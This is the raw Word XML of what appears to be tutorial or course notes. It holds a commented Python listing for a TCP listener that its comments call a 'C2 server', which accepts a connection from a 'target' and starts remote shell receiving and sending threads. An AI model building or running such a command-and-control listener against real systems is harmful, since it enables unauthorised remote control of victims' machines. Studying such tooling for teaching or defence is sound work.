    <w:p w14:paraId="5DABD07F" w14:textId="77777777" w:rsidR="006E1B12" w:rsidRPr="00281B80" w:rsidRDefault="006E1B12" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="236A8D40" w14:textId="320366B6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s = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">(socket.AF_INET, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>socket.SOCK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">_STREAM) </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Instantiate an IPv4 (AF_INET) TCP-based (SOCK_STREAM) streaming network socket interface object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B9A66B" w14:textId="478817B4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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>s.setsockopt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>socket.SOL_SOCKET</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>socket.SO_REUSEADDR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, 1)</w:t>
      </w:r>
      <w:r w:rsidR="00CC5678" w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Allow immediate port reuse, preventing 'Address already in use' errors if the server restarts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72322C5D" w14:textId="78A9CD57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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>s.bind</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">((host, port)) </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Bind the socket structural configuration firmly to our designated IP host and network port parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DCCF4B" w14:textId="72B552C1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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>s.listen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">(5) </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Turn on network listening capabilities, allowing a backlog queue of up to 5 inbound connection requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77092C1C" w14:textId="3134A3F6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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Fore.YELLOW + "[+] listening on port "+str(port), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Fore.WHITE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00CC5678" w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Notify the console operator in yellow text that the C2 server is actively waiting on the target port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EE3365" w14:textId="77777777" w:rsidR="006E1B12" w:rsidRPr="00281B80" w:rsidRDefault="006E1B12" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E368209" w14:textId="3D3529DE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conn, addr = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>s.accept</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Block program execution here until an inbound target client initializes a raw handshake connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C274CAA" w14:textId="3B93FE65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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Fore.GREEN, f'\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>n[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>*] Accepted new connection from: {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>[0]</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>}:{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">1]}', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Fore.WHITE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00C65186" w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Once a client connects, print a success notice tracking the client's external IP address and source port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB4F4D7" w14:textId="77777777" w:rsidR="006E1B12" w:rsidRPr="00281B80" w:rsidRDefault="006E1B12" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B21C934" w14:textId="74F93DA7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#New code starts here. This initiates our threads! </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Code comment noting the start of concurrent task dispatching routines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A30955A" w14:textId="1B6D1E08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################################################## </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Visual section divider for code block isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DE5FC8" w14:textId="7A197F14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s2p_thread = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>threading.Thread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(target=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>shellreceiver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>conn</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00F249CC" w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Create a dedicated thread tasked exclusively with executing the background data collection loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720D5D6F" w14:textId="77C92190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>s2p_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>thread.daemon</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> = True </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Set the thread as a background daemon process so it automatically terminates when the main script shuts down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C66D1B" w14:textId="77777777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>s2p_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">thread.start()   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">                                  </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Spin up and kick off the receiving thread execution path immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28544900" w14:textId="77777777" w:rsidR="006E1B12" w:rsidRPr="00281B80" w:rsidRDefault="006E1B12" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44815493" w14:textId="77777777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s2p_thread = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>threading.Thread</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(target=shellsender, args</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>conn</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, ])</w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create a separate, isolated background thread targeting the terminal transmission loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3096617F" w14:textId="76C54CCB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>s2p_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>thread.daemon</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> = True </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Configure this thread as a daemon process to prevent orphan loops from hanging open upon exit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142713AA" w14:textId="699D6144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>s2p_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>thread.start</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Spin up and begin execution of the input/transmission loop pathway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2A2205" w14:textId="151C6B10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>#################################################</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">#  </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t xml:space="preserve"> Section separator terminating the core thread setups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D67FBAB" w14:textId="77777777" w:rsidR="006E1B12" w:rsidRPr="00281B80" w:rsidRDefault="006E1B12" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="192ED7DE" w14:textId="5009AC1E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#continuous loop </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Outline notes regarding the main thread persistence model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351C2628" w14:textId="546F2A26" w:rsidR="006E1B12" w:rsidRPr="00281B80" w:rsidRDefault="00000000" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">while True: </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Maintain a persistent execution baseline loop to keep the parent script active indefinitely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F0A373" w14:textId="5654C273" w:rsidR="006E1B12" w:rsidRDefault="00000000" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>time.sleep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00281B80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t># Throttle loop iterations to prevent excessive CPU core utilization spikes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23520D74" w14:textId="77777777" w:rsidR="0093698E" w:rsidRDefault="0093698E" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7314DCF1" w14:textId="77777777" w:rsidR="0093698E" w:rsidRDefault="0093698E" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2878ACC3" w14:textId="77777777" w:rsidR="0093698E" w:rsidRDefault="0093698E" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="006600"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69B13391" w14:textId="77777777" w:rsidR="0093698E" w:rsidRPr="00281B80" w:rsidRDefault="0093698E" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
